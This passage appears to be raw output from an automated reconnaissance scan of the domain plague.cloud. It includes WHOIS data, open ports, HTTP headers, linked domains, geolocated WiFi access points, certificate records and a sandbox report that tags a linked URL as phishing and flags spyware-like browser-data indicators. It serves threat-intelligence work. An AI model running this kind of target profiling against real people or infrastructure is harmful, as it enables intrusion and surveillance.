Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns1.sedoparking.com
Name Server: ns2.sedoparking.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-12-18T00:31:03Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: PLAGUE.CLOUD
Registry Domain ID:
Registrar WHOIS Server: whois-service.virtualcloud.co
Registrar URL: https://www.sav.com/
Updated Date: 2022-11-03T20:34:05Z
Creation Date: 2022-02-15T19:19:58Z
Registrar Registration Expiration Date: 2023-02-15T19:19:58Z
Registrar: SAV.COM, LLC
Registrar IANA ID: 609
Registrar Abuse Contact Email: SUPPORT@SAV.COM
Registrar Abuse Contact Phone: +1.8885808790
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: 4004UFCDH
Registrant Name: PRIVACY PROTECTION
Registrant Organization: PRIVACY PROTECTION
Registrant Street: 2229 S MICHIGAN AVE SUITE 411
Registrant City: CHICAGO
Registrant State/Province: ILLINOIS
Registrant Postal Code: 60616
Registrant Country: US
Registrant Phone: +1.2563740797
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder Link https://www.privacyprotection.com/?domain=plague.cloud
Registry Admin ID: 4004UFCDH
Admin Name: PRIVACY PROTECTION
Admin Organization: PRIVACY PROTECTION
Admin Street: 2229 S MICHIGAN AVE SUITE 411
Admin City: CHICAGO
Admin State/Province: ILLINOIS
Admin Postal Code: 60616
Admin Country: US
Admin Phone: +1.2563740797
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: Select Contact Domain Holder Link https://www.privacyprotection.com/?domain=plague.cloud
Registry Tech ID: 4004UFCDH
Tech Name: PRIVACY PROTECTION
Tech Organization: PRIVACY PROTECTION
Tech Street: 2229 S MICHIGAN AVE SUITE 411
Tech City: CHICAGO
Tech State/Province: ILLINOIS
Tech Postal Code: 60616
Tech Country: US
Tech Phone: +1.2563740797
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: Select Contact Domain Holder Link https://www.privacyprotection.com/?domain=plague.cloud
Name Server: NS1.SEDOPARKING.COM
Name Server: NS2.SEDOPARKING.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2022-11-03T20:34:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
plague.cloud
2022-12-18 00:21:03 Web Technology No Web Server Identifier 0 0 4 0 None Express {"content-length": "1554", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"612-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:18 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"}
2022-12-18 00:06:06 Affiliate - Domain Name No DNS Resolver 1 0 2 0 None securemail.pro mail-fr.securemail.pro
2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2086 172.67.190.129
2022-12-18 00:06:07 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://t.co/xvbk0RkXiK', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.244.42.197:443"\n "34.149.204.188:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4284:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:4376:120:WilError_01"\n "Local\\SM0:4376:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:4284:304:WilStaging_02"\n "Local\\SM0:4284:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4284:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3152:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"2342356235.validation11.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: 
[%TEMP%\\4284_441219492\\Part-RU]- [targetUID: 00000000-00004284]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"21a0124d-0d02-45d1-8dc5-b45898592ebc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\21a0124d-0d02-45d1-8dc5-b45898592ebc.tmp]- [targetUID: 00000000-00004284]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004284]\n "4112255d-5bff-4b82-800f-8599cc70a083.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4112255d-5bff-4b82-800f-8599cc70a083.tmp]- [targetUID: 00000000-00004284]\n "c4185f90-bf7a-4c53-893c-ae755caf73f0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\c4185f90-bf7a-4c53-893c-ae755caf73f0.tmp]- [targetUID: 00000000-00004284]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\4284_441219492\\Part-NL]- [targetUID: 00000000-00004284]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\4284_1466836764\\safety_tips.pb]- [targetUID: 00000000-00004284]\n "e3c0ea58-0176-44ff-8693-823909415e07.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3c0ea58-0176-44ff-8693-823909415e07.tmp]- [targetUID: 00000000-00004284]\n "9123dd16-6fb7-4bc0-b876-bc0f9b519290.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\9123dd16-6fb7-4bc0-b876-bc0f9b519290.tmp]- [targetUID: 00000000-00004284]\n "2f74efab-6609-4cd8-a6d1-088065e680dd.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\2f74efab-6609-4cd8-a6d1-088065e680dd.tmp]- [targetUID: 00000000-00002880]\n "f5cce5a2-0bbc-4ebc-bd45-f65e1bfd1625.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f5cce5a2-0bbc-4ebc-bd45-f65e1bfd1625.tmp]- [targetUID: 00000000-00004284]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\4284_1466836764\\_metadata\\verified_contents.json]- [targetUID: 00000000-00004284]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00004284]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.3\\manifest.json]- [targetUID: 00000000-00004284]\n "cb8d8150-2896-4d02-91b8-2cd64521bc9e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\cb8d8150-2896-4d02-91b8-2cd64521bc9e.tmp]- [targetUID: 00000000-00004284]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.html]- [targetUID: 00000000-00004284]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\LOG]- [targetUID: 00000000-00004284]\n "edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4284_1369484392\\edge_tracking_page_validator.js]- [targetUID: 00000000-00004284]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Variations]- [targetUID: 00000000-00004284]\n "Part-IT" has type "data"- Location: [%TEMP%\\4284_441219492\\Part-IT]- [targetUID: 00000000-00004284]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://t.co/xvbk0RkXiK"\n Pattern match: "https://t.co"\n Heuristic match: "2342356235.validation11.repl.co"\n Heuristic match: "234__5G_35va|_datlol111.rep|.co"\n Heuristic match: "1.repl.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\4284_1369484392\\edge_tracking_page_validator.js]- [targetUID: 00000000-00004284]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\4284_441219492\\adblock_snippet.js]- [targetUID: 00000000-00004284]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\4284_1369484392\\shopping_iframe_driver.js]- [targetUID: 00000000-00004284]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\4284_1369484392\\shoppingfre.js]- [targetUID: 00000000-00004284]\n Dropped file: "product_page.js" - Location: 
[%TEMP%\\4284_1369484392\\product_page.js]- [targetUID: 00000000-00004284]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\4284_1369484392\\auto_open_controller.js]- [targetUID: 00000000-00004284]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\4284_1369484392\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004284]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\4284_1369484392\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004284]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4284_441219492\\Part-RU]- [targetUID: 00000000-00004284]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004284-00000BE4-10923916685\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004284-00000BE4-11564684951\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (I 34.149.204.188 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 5 0 2 0 None http://webmail.zerotwo-best-waifu.online/ webmail.zerotwo-best-waifu.online 2022-12-18 00:21:51 Open TCP 
Port No Censys 0 0 2 0 None 172.67.137.37:2053 172.67.137.37 2022-12-18 00:21:30 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b111e70f46faf6-DUS Content-Encoding: gzip 172.67.190.129 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None GOAT (Net ID: 00:00:C5:D3:87:1C) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None matrix (Net ID: 00:02:2D:03:92:64) 37.7803446,-122.3906132 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Apple Network 3668a9 (Net ID: 00:02:2D:00:C6:8F) 37.780462,-122.390564 2022-12-18 00:03:03 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.103 90.116.166.104 2022-12-18 00:09:33 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.11:8443 188.114.96.0/24 2022-12-18 00:03:48 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:e2:2d:48:dd:4c:ac:71:43:1c:ff:e5:61:16:60:4c:1f:a4 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Oct 26 15:30:18 2020 GMT Not After : Jan 24 15:30:18 2021 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:eb:43:89:5d:2a:2b:fb:94:8a:04:2c:02:af:2a: 96:5b:3f:07:89:51:76:35:bf:db:b4:27:c7:db:3b: 22:5b:13:e2:bb:1a:ef:bd:f3:63:62:e1:9a:41:57: c7:e1:64:a6:3c:fb:73:f3:7e:8b:92:8b:36:7d:f5: 90:ef:19:3e:2a:70:e3:b1:1d:a8:a5:10:14:d9:44: 1e:e2:d1:86:fe:ed:a0:95:8f:1e:1f:b8:a0:64:8a: 03:2e:24:de:da:18:02:31:72:4c:bc:08:b8:b9:7d: 
37:68:59:71:ff:34:47:3a:f5:31:0a:7b:e3:d7:a4: 57:9a:28:af:cb:cb:02:23:42:43:84:37:4b:43:a3: 7c:16:14:5c:c2:31:5d:41:8d:54:c0:19:2e:fc:1a: 1e:00:56:d0:6f:f0:7b:c7:06:ee:1d:32:f2:21:a6: 9b:2e:bf:1e:72:64:69:22:a6:bd:c9:5c:55:eb:28: 7f:90:ac:ce:a3:a0:3c:70:26:56:e2:ce:7e:0a:78: 11:31:a1:34:1f:1e:da:ce:6d:10:0d:02:88:dc:c0: 6a:29:a9:37:1f:9f:89:b4:a9:22:a8:7c:2d:4a:8f: a5:88:bf:b8:15:de:16:82:69:48:6c:4a:f5:1e:ac: 25:5f:c9:ac:67:4a:56:29:88:80:5a:e0:c0:f1:e2: 75:07 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D2:0D:67:35:38:EF:6A:3B:4A:2F:E7:A1:89:80:E8:46:87:08:00:70 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 5C:DC:43:92:FE:E6:AB:45:44:B1:5E:9A:D4:56:E6:10: 37:FB:D5:FA:47:DC:A1:73:94:B2:5E:E6:F6:C7:0E:CA Timestamp : Oct 26 16:30:18.641 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DC:B4:89:A6:A0:5A:ED:1D:B3:AC:CD: 37:B3:A5:79:03:9A:43:47:AA:C4:6A:A8:48:B1:EF:C0: 78:B9:66:89:F8:02:21:00:B9:0C:81:17:71:73:95:B5: E7:1B:DB:ED:99:E8:D3:34:03:49:96:28:B5:3C:79:35: C1:94:17:A7:68:1C:86:8C Signed Certificate Timestamp: Version : v1 (0x0) Log ID : F6:5C:94:2F:D1:77:30:22:14:54:18:08:30:94:56:8E: E3:4D:13:19:33:BF:DF:0C:2F:20:0B:CC:4E:F1:64:E3 Timestamp : Oct 26 16:30:18.636 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:BC:11:DA:30:F8:B8:98:A2:8C:8B:4A: 
66:E7:72:D4:1A:B7:FE:23:52:9B:59:4E:5B:68:10:A3: 32:CF:C7:4C:64:02:20:7D:D2:42:BF:15:1A:72:F7:66: 5B:D2:BB:19:EC:65:6A:8D:8C:C5:58:E5:16:14:C9:AA: 31:43:2C:F4:27:B0:89 Signature Algorithm: sha256WithRSAEncryption 65:59:4e:b2:06:fd:8c:80:fc:73:c0:96:54:e5:4e:b4:1b:25: 3d:76:a2:a7:bf:93:6e:2f:88:a4:39:ba:88:69:b8:f7:72:57: f5:81:77:be:6a:1b:cb:ab:d2:cc:b4:26:2f:34:2d:60:2d:fa: 7f:45:1d:72:b4:4a:39:a9:9f:7c:44:6a:07:34:0c:fd:f5:d4: fa:57:f3:6e:29:4b:a4:23:6f:7f:f1:2b:1b:ad:af:a8:99:93: 2b:8a:0e:1a:84:37:e2:2f:d7:fa:42:8e:72:4b:1b:33:23:5a: a6:a0:3a:db:2d:73:62:ba:62:6e:41:99:3f:fd:e8:43:d1:8a: 26:38:34:21:d6:b3:af:50:0d:de:5d:be:c5:f5:64:a4:b7:89: 67:60:6d:a9:ee:37:6f:90:e8:fb:e5:8b:68:b9:de:e0:d3:e0: 91:78:e9:96:57:9e:90:3c:08:40:95:cd:1e:b1:15:90:b4:79: d9:1e:e6:d3:bd:aa:2a:bb:24:bd:05:6a:2f:ed:59:e8:f8:10: 1b:7b:d1:a2:d6:4b:33:2a:5b:de:da:37:47:49:94:89:3d:91: 2a:35:3c:ac:3d:59:f3:96:be:fd:6d:bb:7e:75:d6:1f:de:07: 57:d2:c6:25:df:12:cf:c8:e2:e8:ba:12:78:d6:5a:99:40:19: c1:6a:2d:2c plague.fun 2022-12-18 00:02:45 SSL Certificate - Raw Data No CertSpotter 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 
Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 20 21:09:20.492 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:FA:2E:39:B5:4A:7E:1E:99:95:86:B9: B3:8A:E4:80:9D:CD:AB:17:D7:B7:40:4F:C3:9B:ED:54: 24:9C:11:BD:02:21:00:FD:45:FB:F2:A1:3E:CD:E8:A2: CC:34:29:02:72:8C:EB:99:C0:CA:A0:21:99:F7:A1:5B: C1:74:A7:32:F7:42:7F Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 20 21:09:20.448 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:FC:14:96:0B:ED:FC:D9:C5:2A:9E:6F: 52:EE:C7:06:D0:67:B9:01:DA:56:7D:5C:92:2F:10:76: DF:F1:5D:90:3E:02:21:00:B4:D1:00:98:21:12:BC:2A: 54:52:F2:E6:8B:33:79:69:58:57:C6:67:70:5C:DA:3B: E7:67:04:E5:84:09:7B:A8 Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:0c:9f:02:9e:a6:3f:cd:3b:85:32:2b:49:96:f2: 00:58:fd:40:65:de:b9:94:b5:11:ef:8a:23:0c:07:ec:f5:75: 18:07:07:24:15:e7:ea:8b:b4:36:77:75:83:eb:b0:3e:02:30: 2d:3e:43:61:54:0c:77:dc:17:fe:4d:45:de:d3:ad:b2:35:a2: 15:2e:45:32:25:68:c3:f7:9c:53:f8:b9:69:7b:8a:0e:27:5e: 8e:8c:9c:98:c5:ad:33:67:02:7f:98:09 misogyny.wtf 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": 
[""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77ae8278c9706174-ORD"]} 188.114.97.1 2022-12-18 00:23:29 Internet Name No DNS Raw Records 0 0 2 0 None zerotwo-best-waifu.online www.zerotwo-best-waifu.online 2022-12-18 00:04:24 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:2f:49:07:90:93:a8:06:e6:05:0c:26:40:50:ef:77:d7:82 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jun 25 16:58:02 2022 GMT Not After : Sep 23 16:58:01 2022 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a7:42:04:24:5f:8a:a1:8e:2a:9b:a7:b7:21:0d: a4:62:c8:51:a7:ef:52:40:c8:b5:22:04:eb:5e:8e: 25:d1:44:39:60:05:3e:fb:b9:da:dd:20:85:a9:ea: 54:8d:e2:8f:7c:be:ee:ab:ac:3e:d0:47:4d:7a:58: c4:55:85:fe:80:9b:a8:f2:35:2b:e8:90:54:7e:a1: 7b:0b:62:68:28:70:70:73:be:8e:ca:f3:45:fd:69: 71:33:d8:f2:63:fa:32:9f:a0:84:f5:07:62:63:b8: e8:92:c6:0a:ee:83:9b:26:52:0f:db:a7:0d:05:dd: ed:89:e7:52:91:7d:75:09:d1:34:a8:1d:f5:9e:54: 05:44:af:1f:65:ff:3f:72:7b:89:3a:e1:5e:60:fb: dd:c7:b7:00:dc:e2:58:d6:bc:db:84:6f:37:85:d7: 64:56:f8:ec:73:07:db:33:23:fb:b0:f2:26:2c:a5: 9f:72:c5:f1:51:16:a3:bc:8d:99:9c:f4:7a:b5:18: 7a:21:00:1a:14:0f:eb:75:c7:9b:65:14:6d:c3:ca: 92:cb:2d:35:45:05:0b:26:01:ec:ec:cc:55:4b:57: 38:28:c0:0c:ce:7c:90:a0:9e:77:81:bd:d8:44:50: 93:c4:b3:06:22:00:23:c7:f0:38:45:c6:33:2f:47: ec:a3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 37:FE:FE:AC:E2:AA:BE:88:2E:59:E7:E5:2B:89:3F:69:6E:86:54:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - 
URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jun 25 17:58:02.924 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:2A:33:D6:FB:DC:3B:23:AE:6E:B7:B1:F2: F4:71:1F:A7:53:03:88:8C:0B:95:75:4E:6F:47:92:A2: F5:6E:CE:1C:02:20:33:50:11:B4:57:ED:06:D5:4B:0F: 06:CD:E7:79:0E:D0:12:44:99:8B:8A:FA:26:84:5C:38: BF:F0:06:AB:43:15 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jun 25 17:58:03.082 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:14:34:5F:52:F3:61:E8:F1:08:A8:84:EC: E2:88:06:E9:5F:A1:0C:70:63:5A:C2:64:4C:06:61:2B: FD:3C:D8:B4:02:20:22:13:97:E8:81:E2:5B:2A:71:5E: 